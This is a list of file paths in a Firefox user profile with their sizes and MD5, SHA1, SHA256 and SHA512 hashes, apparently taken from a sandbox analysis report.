C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\gmp-widevinecdm\4.10.2891.0\widevinecdm.dll
Filesize18.5MB
MD51b32d1ec35a7ead1671efc0782b7edf0
SHA18e3274b9f2938ff2252ed74779dd6322c601a0c8
SHA2563ed0dec36754402707c2ae4fbfa887fe3089945f6f7c1a8a3e6c1e64ad1c2648
SHA512ab452caa2a529b5bf3874c291f1ffb2a30d9ea43dae5df6a6995dde4bc3506648c749317f0d8e94c31214e62f18f855d933b6d0b6b44634b01e058d3c5fcb499
-
Filesize
8KB
MD5281dad8de6c7e7ca375b3a4abcc147c3
SHA138da072fd4b7065ed55bf35dacd580d476422a55
SHA25645410f0693b923a115c099a330d0ecea16abe8560402a59e808a4b08f2433ecd
SHA512c7d4488e6dd296c354ebdca0adb9662fd2f2c89ff6875adb9bdd875e94f148cf1cf32fd847cc0e484de78866058e78d1747fcfef7d61ce1f0d82be1dbc0a1816
-
Filesize
6KB
MD5b1e09e0be801d9a8ecfbadd6f5ea5506
SHA133849d06419b360613f0532692857f739d2374f4
SHA256d05963af5c1a8d21edb90639382d5cbbf90e44e2195854d8a4f53d28c6093510
SHA5121854b8b2404e6650693e0dc42e80364f30f4ca65945ea2d4bf2efd1b28075590dbe030797f0ef25c5f0cdf76b3fa5b83332c5f7f39a7e7ed1a9fa4abdeb02a91
-
Filesize
6KB
MD5da87700ca6d5731ff19fded1cd7733d3
SHA1016982e9b88bc23615a5d707a86f2a150913878d
SHA256e387a2f63807c74b04c6abd7fcd8637b55f3c1244cb86f700d65b0b86ec3c300
SHA5122bd391adc9099dc144b45a86058041caa16618880704d2369543afbc26401275aae272f96b4505dd7cef82b19da6f8eb6d0a8f6cc166bc156cc202ea578aa869
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\sessionstore-backups\recovery.baklz4
Filesize1KB
MD5721494f118861133aaccae8dfa0a4a6b
SHA1ef87ed35f92477d44a9b9ccae7f9d8e2bc9c7161
SHA2563d5b0a29fbdcce39fba3832244f562da74da3ec82e23ae19b48d625e1003fe6c
SHA5120ce38d3934ac21d9d068ce67149153af9c972b9117da825b4f571196d82deeeac3f3b4f416e25296bba5c8033491ac0b4b87094c97ec0b20b8e1453785119f60
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize3.4MB
MD5a6df5eb0e35484289595c504f537c49f
SHA16dfe075bdde2611fab22761902b18e3d93b435f5
SHA25675dd9b0b590adc5191c3ea754277449e34d53b4bc22835ede7c06b7ba2bf184f
SHA512127832daea0e89bdec0a803c9c3ac3392d83a6c25ec82ea793723f28ebc98ede2cf6ad957c67816b5f0c9ad29733fba15f17132dc72dff72b3b689cb6708de14
-
Filesize
2KB
MD585f1c41ba1ddd15760b2762a4ec4a755
SHA1589e74240cfbb46ee6d711db6a0ff0d0b875fb2b
SHA256f1039942c6ac54bd8e53bd311fb2783d6b9b2df60e426b3adf1033054067ff3d
SHA512a61ce7c8f0ef7714bc5513c0e4afe533fe3260c1837f384f9de0e0078438cad995b060cb06b9e883d4b366b59f46bbee6d7763ab7a820823b0fe643d4e08f84e